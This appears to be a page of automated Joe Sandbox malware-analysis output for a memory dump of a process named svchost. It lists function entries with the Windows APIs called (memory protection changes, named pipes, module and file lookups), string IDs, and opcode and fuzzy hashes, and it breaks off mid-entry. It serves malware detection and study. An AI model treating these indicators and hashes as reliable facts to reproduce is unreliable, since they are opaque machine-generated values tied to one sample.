                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 0d58e6c7b06e3a54d04d8329436024ef45801c87d925d1ec8da3a648c607d7f4
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 7031B132701B5182FF91DF56A54836D7BA0FB94B80F0841209F8D23B55EF3AD4A58B42
                                                        Function 0000026A879C1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: a8e0171c67a4090ba16aba086995a0a5f9f3aa4c4eb718285ba1c06af9c52706
                                                        • Opcode Fuzzy Hash: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction Fuzzy Hash: 98015771704A4082FAA0DB12F85835D7AA1F788BC1F888134DE8D63798DE3AC986CB41
                                                        Function 0000026A879C3B00 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction ID: 143900c74a0df011e25cc0b83d673d986b9b5014fc7cfd2f33c15e527db131aa
                                                        • Opcode Fuzzy Hash: 30c8d17d90bd3745ebdb1f35502c968551356a20b63a74c7033b0010c96071d1
                                                        • Instruction Fuzzy Hash: C611D775611B40D6FFA4DB25E81C72E7FB0AB88B46F080825C94D67764EF3EC5588B02
                                                        Function 0000026A879C19D8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 2c744fe53c43a248a6804df52b1a5713068d28465468128cf141ac8cb254e403
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 93F08C7234468192FBA0CB25E99835D7F60F784BC9F848020CA4C53958EE7EC688CF05
                                                        Function 0000026A879C330C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CombinePath
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3422762182-91387939
                                                        • Opcode ID: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction ID: 740eec389ae694c30906cdc4a70235e8303d7f674255944eb109aec758b9ec89
                                                        • Opcode Fuzzy Hash: 0fefe4693416a643ad9e70920ffc3e33abc3de2cb316a83794251c8f9330dfe7
                                                        • Instruction Fuzzy Hash: 76F08230704B80D2FE90CB13B90811D7E21EB48FD1F488131DE5E27B68DE2DC4818B02
                                                        Function 0000026A879CA258 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: b1b204c9b3a76027ebfb515103c1ab1bb3bd2d4f4e351f9c0d0a1ba853116149
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: ADF08C71721A00C1FFC4CF61E88C36C3F60EB88B52F481419990F67260DF2AC488DB02
                                                        Function 0000026A879C54F0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: 0e93d523014fe33429086a29fcd4ec5f8b25b04b5faab58ad0c4886581baa407
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: DE02CC36219B8086EBA0CB55E49435EBBA0F3D5794F204116EB8E97BA8DF7DC484CF01
                                                        Function 0000026A879D0980 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 0000026A879D09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000026A879D093F,?,?,?,0000026A879CE263), ref: 0000026A879D0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000026A879D093F,?,?,?,0000026A879CE263), ref: 0000026A879D0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 9785ada16f6ba613f265021b1b5f3b4dde76e450c38aa902d93f95b18eb431ac
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 5181CF32610A5089FBD0DF69C8883AD7FA1F784B98F444156DE2A77791DB3AC441CF22
                                                        Function 0000026A879C5B30 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction ID: 4ee369ca84b0e94f961d075eefea6419c5e507c7228b4ca4eab765bd7bfc8873
                                                        • Opcode Fuzzy Hash: dbebcfa212769c950804440a44d24f2a92ce7775a833934e53173bcf02afa0e6
                                                        • Instruction Fuzzy Hash: E361DA36519B44C6EBA0CB15E45831EBBA4F3D8784F605216FA8E57BA8DB7EC540CF01
                                                        Function 0000026A879A13D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 3cba833c7c3e8635b78570d7036d81f2c335cee3c60ac54628be692665e7f048
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 1911A932AD2B1101F7D4122CE55E3ADB2F16B94774F184624EA77377DAFB1AC9414903
                                                        Function 0000026A879D1FD8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: d09477ec4ac729a0b8a5126bc7e50452c296aa99132a7193bf38e456d7ddac9c
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 81116932A54A0102F7E89624D55E36D7D606BA53B4F144635AF763B7D6CA1FC8C2C903
                                                        Function 0000026A879C3BB8 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 8cf684c279c47e5a316fbe476e5be281943219fab7ad6c2e1befb6ee7df75a20
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 4F115B3A704B4082FF949B25E44C2AE7AB0F788B95F084029DE8D17794EF3EC548CB06
                                                        Function 0000026A879C3558 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 2943f072f88694575b776650e15300b126d3f9b990d1373b75b60a8a3de24066
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: B4118E35300B40A1FF90DB25E90A39E7BA0F7C8780F8500219E4DA3798EF2AC915DF86
                                                        Function 0000026A879C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: a03360d1949d0afa7a791c42e6c64afc6343680673b3dd1a26165067a15b95fe
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: BE011A76610B92C6E784DFA6E80815D7FB1F788F85F084425EA4E63B28EE39C455CB41
                                                        Function 0000026A879C2618 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: ca24dbbf011402c8ccefec4d0567cec08fe62c6b451f17e144b73c72737f7b6c
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 8571823220478186FFA4DF2699583EE77A5F3C9B84F440025DE49A7B99DF36C685CB02
                                                        Function 0000026A8799D178 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000003.1826644218.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_3_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 7b41ddfce685e6d2e0c9efc9c6e4e9a83fb9321eebb737032e5b964e986635b1
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: 3661C13260964082FAF89B2891CE36D7BE8F785795F144425DA0A377A2DA3BC841CF13
                                                        Function 0000026A879C2408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction ID: eaeebad90c2e7299d721a9da3962111a9b8eda6252e0573b52ea7b3221bcf299
                                                        • Opcode Fuzzy Hash: 15f2f4e0f9d638f158a96525c1ecafbceb1b9e2c8075581ad63209208a78af1e
                                                        • Instruction Fuzzy Hash: 53518E362087C582EFA4DE25A46C3AF7B61F3D9780F440015DF8923B99EA7BC5859F42
                                                        Function 0000026A879D0724 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction ID: 5fffcb82b90d14cfdd4a8c7740e9cacbf46d68fa6c8f1ff5a458f01875668730
                                                        • Opcode Fuzzy Hash: f44db66318a18b3e6bf0bbc027b995569a44fb504c85fb8b49b9fe2e6159cddc
                                                        • Instruction Fuzzy Hash: 2B41B132714B8082EBA0DF29E8483AE7FA1F798794F854021EE4D97798DB3EC441CB41
                                                        Function 0000026A879CD7E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_17_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Stringtry_get_function
                                                        • String ID: LCMapStringEx
                                                        • API String ID: 2588686239-3893581201
                                                        • Opcode ID: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction ID: 7d742faf528b6f908273379c17201dcb0ec9fe9c21d1d042ae66690c57d519ef
                                                        • Opcode Fuzzy Hash: 9eb651065806efa1f3c1ddeda68a4214a605e5c82d734f3d398dbc25806cdd5e
                                                        • Instruction Fuzzy Hash: B7111D36608B8086DBA0CB15F84439EBBA5F7C9B84F544126EECD53B59CF38C5508B40
                                                        Function 0000026A879C95F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000011.00000002.2950708004.0000026A879C1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        • Associated: 00000011.00000002.2949913388.0000026A879C0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2951678801.0000026A879D3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2952497009.0000026A879DD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2953310575.0000026A879DF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000011.00000002.2954113525.0000026A879E5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
